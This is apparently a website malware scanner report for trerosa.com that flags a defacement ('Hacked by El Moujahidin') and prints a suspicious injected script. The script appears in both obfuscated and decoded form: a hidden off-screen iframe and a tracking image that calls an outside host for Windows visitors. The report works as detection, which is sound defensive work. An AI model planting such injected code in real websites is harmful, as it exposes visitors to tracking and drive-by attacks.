New scan:

Malware Scanner report for trerosa.com

Malicious/Suspicious/Total urls checked
0/1/15
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

ADs charset+AD0-iso-8859-1+ACI /+AD4APA-title+AD4-Hacked by El Moujahidin+ADw-/title+AD4APA-style ty  (56 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://trerosa.com/
200 OK
Content-Length: 54857
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var a819711=[130,190,230,235,248,162,245,246,251,238,231,191,164,242,241,245,235,246,235,241,240,188,162,227,228,245,241,238,247,246,231,189,162,238,231,232,246,188,175,179,178,178,167,189,162,246,241,242,188,178,167,189,162,249,235,230,246,234,188,179,178,178,167,189,162,234,231,235,233,234,246,188,179,178,178,167,189,164,192,140,190,245,229,244,235,242,246,192,140,248,227,244,162,235,191,178,189,140,235,232,170,240,227,248,235,233,227,246,241,244
...[1408 bytes skipped]...

Decoded script:


<div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">
var i=0;
if(navigator.appVersion.indexOf("Win")!=-1){var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}
function dpp(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";}i=1;return;}
<iframe onload="return dpp(this);" style="width:65%;height:65%;" src="about:blank"></iframe>
</div>
var i=0;
if(navigator.appVersion.indexOf("Win")!=-1){var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}
function dpp(o){if(i==1)return;if(navigator.ap
var i=0;
if(navigator.appVersion.indexOf("Win")!=-1){var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}
function dpp(o){if(i==1)return;if(navigator.ap

Deface/Content modification. The following signature was found: ADs charset+AD0-iso-8859-1+ACI /+AD4APA-title+AD4-Hacked by El Moujahidin+ADw-/title+AD4APA-style ty

...[522 bytes skipped]...
l PUBLIC +ACI&#8211;//W3C//DTD XHTML 1.0 Transitional//EN+ACI +ACI-http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd+ACIAPgA8-html xmlns+AD0AIg-http://www.w3.org/1999/xhtml+ACIAPgA8-meta name+AD0AIgAi content+AD0AIgAi /+AD4APA-meta name+AD0AIg-publisher+ACI content+AD0AIg-MUS4LLAT+ACI /+AD4APA-head+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI content+AD0AIg-text/html+ADs charset+AD0-iso-8859-1+ACI /+AD4APA-title+AD4-Hacked by El Moujahidin+ADw-/title+AD4APA-style type+AD0AIg-text/css+ACIAPgA8ACE&#8212;body,td,th +AHs color: +ACM-CCCCCC+ADsAfQ-body +AHs background-color: +ACM-000000+ADsAfQ.style1 +AHs font-family: tahoma+ADs font-size: 10pt+ADsAfQ.style2 +AHs color: +ACM-FF0000+ADs font-weight: bold+ADsAfQ.style3 +AHs-color: +ACM-FFFFFF+AH0.style7 +AHs-color: +ACM-FFFFFF+ADs font-weight: bold+ADs +AH0.style8 +AHs font-family: tahoma+ADs font-size: 16pt+ADs color: +ACM-FFFFFF+ADsAfQ.style11
...[57686 bytes skipped]...


http://trerosa.com/wp-includes/js/comment-reply.min.js?ver=3.5
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?ver=1.7.2
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://trerosa.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995
200 OK
Content-Length: 26590
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06
200 OK
Content-Length: 1791
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/plugins/woo-tumblog/functions/swfobject.js
200 OK
Content-Length: 6887
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/jquery.easing.min.js
200 OK
Content-Length: 7046
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/cufon-yui.js
200 OK
Content-Length: 18258
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/jquery.transit.js
200 OK
Content-Length: 19118
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/jquery.masonry.min.js
200 OK
Content-Length: 5497
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/scripts.js
200 OK
Content-Length: 27444
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/jquery.wipetouch.js
200 OK
Content-Length: 11642
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/gallery.js
200 OK
Content-Length: 16143
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/plugins/placeholder/jquery.placeholder.js
200 OK
Content-Length: 2416
Content-Type: application/javascript
clean
http://trerosa.com/wp-content/themes/trerosa/js/plugins/validator/jquery.validationEngine.js
200 OK
Content-Length: 24478
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: trerosa.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 21 Aug 2015 01:02:15 GMT
Pragma: no-cache
Server: nginx/1.8.0
Content-Type: text/html; charset=UTF-7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=trerosa.com
Set-Cookie: PHPSESSID=34d828a9b7de276f3cda6cab801d276a; path=/
X-Pingback: http://trerosa.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: trerosa.com
Referer: http://www.google.com/search?q=trerosa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=trerosa.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trerosa.com/

Result: trerosa.com is not infected or malware details are not published yet.